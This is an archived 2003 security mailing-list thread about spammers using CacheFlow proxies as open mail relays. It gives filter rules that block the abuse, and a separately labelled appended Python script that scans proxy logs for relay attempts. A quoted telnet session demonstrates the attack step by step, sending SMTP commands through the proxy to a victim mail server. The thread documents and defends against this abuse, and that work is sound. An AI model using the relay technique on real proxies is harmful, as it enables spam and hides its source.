Incidents
Cacheflow proxy abuse (revisited) Sep 10 2003 03:22PM Tim Kennedy (tim timkennedy net)
Re: Cacheflow proxy abuse (revisited) Sep 12 2003 07:10AM Alain Fauconnet (alain ait ac th)
Alain,
If you make sure all 4 of these lines are in your inline filter,
it will block both the GET and POST methods of making outbound
connections on a cacheflow.
--------------------------------------------------------------------------
cacheflow#conf t
cacheflow#(config)inline filter-list local ccc
https://.*:(443|80) service=yes
https://.*:[0-9]+/ service=no
http://.*:(443|80) service=yes
http://.*:[0-9]+/ service=no
ccc
--------------------------------------------------------------------------
Sorry, I left the second two (http) lines out, in my original mail.
I left the log of the original telnet session at the bottom of this
reply. When I add these lines to the cacheflow, and try to GET or
POST to another server, on another port, I get:
--------------------------------------------------------------------------
memnoch[1075]# telnet 10.0.2.190 80
Trying 10.0.2.190...
Connected to 10.0.2.190.
Escape character is '^]'.
POST / HTTP/1.1
HOST: mail.yellowbrix.com:25
HELO .
HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2678
Content-Type: text/html
Connection: close
--------------------------------------------------------------------------
At least, it worked for me, and people have stopped relaying through
our cacheflow.
-Tim
On Fri, 12 Sep 2003, Alain Fauconnet wrote:
> Hello,
>
> Thanks for the info. That does prevent the CONNECT abuse, but not the
> POST abuse, which can be used almost in the same way (although a bit
> more difficult) to use a Cacheflow to hide one's tracks when spamming.
>
> Greets,
> _Alain_
>
> > --------------------------------------------------------------------------
> > telnet ip.or.hostname.of.cacheflow 80
> > GET / HTTP/1.1
> > HOST: mailserver.victim.com:25
> > HELO .
> > mail from: spammer (at) alter (dot) net [email concealed]
> > rcpt to: target (at) unsuspecting (dot) com [email concealed]
> > DATA
> > Subject: Look Ma! I'm an open relay
> > HI, you've been spammed through an open proxy, because of a bug in the
> > OS code. Have a Great Day!
> > -Spammer
> > .
> >
> > 220 mailserver.victim.com ESMTP Sendmail 8.12.9/8.12.9; Wed, 10 Sep 2003
> > 11:15:31 -0400
> > 500 5.5.1 Command unrecognized: "GET / HTTP/1.0"
> > 500 5.5.1 Command unrecognized: "HOST: memnoch.sugarat.net:25"
> > 250 mailserver.victim.com Hello CacheFlowServer@[xxx.x.x.xx], pleased to
> > meet you
> > 250 2.1.0 spammer (at) alter.net. (dot) . [email concealed] Sender ok
> > 250 2.1.5 target (at) unsuspecting.com. (dot) . [email concealed] Recipient ok
> > 354 Enter mail, end with "." on a line by itself
> > 250 2.0.0 h8AFFVfo011729 Message accepted for delivery
> > 500 5.5.1 Command unrecognized: "Cache-Control: max-stale=0"
> > 500 5.5.1 Command unrecognized: "Connection: Keep-Alive"
> > 500 5.5.1 Command unrecognized: "Client-ip: xx.xx.x.xxx"
> > 500 5.5.1 Command unrecognized: ""
> > ^]
> > telnet> close
> > Connection closed.
> >
> > --------------------------------------------------------------------------
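An added example, not code from Tim's or Alain's messages: the two telnet sessions above show that the relay abuse works because the proxy opens a connection to whatever host:port the request names (CONNECT host:port, an absolute URL with a port, or a bare path plus a HOST header carrying the port), and the inline filter refuses anything that is not 80 or 443. The Python below applies the same rule to proxy log records so you can check, after the fact, whether GET, POST or CONNECT requests reached other ports. The log layout and all sample lines are constructed for illustration; they are not CacheFlow's real log format.

```python
# Added example, not code from the thread: flag proxied requests whose real
# destination port is not 80 or 443, i.e. the GET/POST/CONNECT relay pattern
# the inline filter above is meant to refuse. The log format and all sample
# lines below are constructed for illustration, not CacheFlow's real format.
import re
from typing import List, Optional, Tuple

ALLOWED_PORTS = {80, 443}

# Absolute URL as it appears in a proxied GET/POST request line.
URL_RE = re.compile(r'^(?P<scheme>https?)://(?P<host>[^/:]+)(?::(?P<port>\d+))?')
# host[:port] as used by CONNECT and by the HOST header.
HOSTPORT_RE = re.compile(r'^(?P<host>[^/:]+)(?::(?P<port>\d+))?$')
# Constructed log line layout: timestamp client method target host-header ('-' if none).
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+(?P<host>\S+)$')


def target_port(method: str, target: str, host_header: Optional[str]) -> Optional[int]:
    """Return the TCP port the proxy would open for this request, or None if
    it cannot be determined. CONNECT carries host:port in the request line;
    GET/POST carry either an absolute URL or (as in the sessions quoted above)
    a bare path plus a HOST header that names the port."""
    if method == 'CONNECT':
        m = HOSTPORT_RE.match(target)
        return int(m.group('port') or 443) if m else None
    m = URL_RE.match(target)
    if m:
        if m.group('port'):
            return int(m.group('port'))
        return 443 if m.group('scheme') == 'https' else 80
    if host_header and host_header != '-':
        m = HOSTPORT_RE.match(host_header)
        return int(m.group('port') or 80) if m else None
    return None


def verdict(method: str, target: str, host_header: Optional[str]) -> str:
    """'allow' for 80/443, 'deny' for any other port, 'unknown' if unparsable."""
    port = target_port(method, target, host_header)
    if port is None:
        return 'unknown'
    return 'allow' if port in ALLOWED_PORTS else 'deny'


def scan(log_text: str) -> List[Tuple[str, str, int]]:
    """Return (client, method, port) for every request that should have been denied."""
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the constructed layout
        method, target, host = m.group('method'), m.group('target'), m.group('host')
        if verdict(method, target, host) == 'deny':
            flagged.append((m.group('client'), method, target_port(method, target, host)))
    return flagged


# Constructed sample log: two relay attempts to port 25, one to 8080, two legitimate.
SAMPLE_LOG = """\
2003-09-10T11:15:31 10.0.2.5 POST / mail.example.com:25
2003-09-10T11:15:40 10.0.2.5 GET http://www.example.com/index.html www.example.com
2003-09-10T11:16:02 10.0.2.7 CONNECT smtp.example.net:25 -
2003-09-10T11:16:15 10.0.2.9 CONNECT www.example.com:443 -
2003-09-10T11:16:30 10.0.2.9 GET http://www.example.com:8080/ www.example.com:8080
"""

if __name__ == '__main__':
    for client, method, port in scan(SAMPLE_LOG):
        print(f'{client} used {method} to reach port {port}')
```

The port logic mirrors what the filter lines encode: a request is only served when the port the proxy would dial is 80 or 443, whichever of the three places (CONNECT target, URL, HOST header) names it. Adapt `LOG_RE` to the field order of your own proxy's access log before running it over real data.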